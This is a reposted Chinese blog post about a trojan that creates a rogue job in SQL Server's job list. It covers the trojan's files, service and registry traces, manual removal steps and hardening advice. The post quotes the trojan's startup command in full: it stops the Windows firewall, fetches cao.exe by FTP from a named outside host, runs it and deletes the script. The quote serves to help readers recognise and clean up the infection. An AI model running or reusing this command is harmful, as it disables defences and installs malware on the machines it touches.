关于SQL企业管理器:作业中添加了一个叫x的作业的木马问题(转)

 

原文 http://myeblog.3322.org/1215.html

1、这个是有一个木马造成的。
你看一下，c:/windows/system32下是否有多个64K的xml文件(转载备注：我搜到一个叫sysS.xml的文件，用ue打开却是一个改了扩展名的access文件，前面有Standard Jet DB字样)，还有一个隐藏的wsynalib.exe，服务里还会有一个叫Windows System Active的。
处理方法，是先删除wsynalib.exe和多个64k的xml文件，再删c:\windows\system32下isql文件夹，之后修改注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor下AutoRun 的选项为空，然后再删掉服务Windows System Active

2、

一般出这个问题的都是拨号上网的电脑，而路由上网的电脑基本没有这个问题，办法如下
1：重新格式化C盘以及安装SQL的分区
2：安装系统，并开启WINDOWS防火墙（此时你就能看出WINDOWS防火墙的功能不是360能够替代的，那就是端口的监控和防御）
3：安装SQL并将SQL的默认1433端口修改成其它（这一步应该是最重要的）
4：设定系统密码和SA密码
问题解决，这是经过很多次的验证的，本身这是个木马，杀毒软件没有一个能查出来，查出来的都是这个木马下载下来的病毒，让你们看一下这个木马开机执行的命令，是个CMD命令 ，一般你开机看到有个DOS命令执行一下就消失了，一般都是类似的东西在作怪
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open daoke3322.3322.org> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt
解释一下就是停止WINDOWS防火墙服务，然后从指定的地址下载病毒，然后删除日志

 

转载后记：我电脑上的也出现了一个作业，显示创建日期是2010.12月。也没太注意这个事情。估计某个时间上网中了木马。杀毒软件或许已经清理了病毒文件。所以按以上处理，无法对应。不过我想，这个病毒会有很多版本和变种。他们的共同特征就是在sql中创建作业并恶意下载病毒文件。他的主程序是一般的正常程序，只是从远程下载的文件是病毒。如果有实时的防病毒，应该问题不大。没漏洞就不叫软件了，真是防不慎防。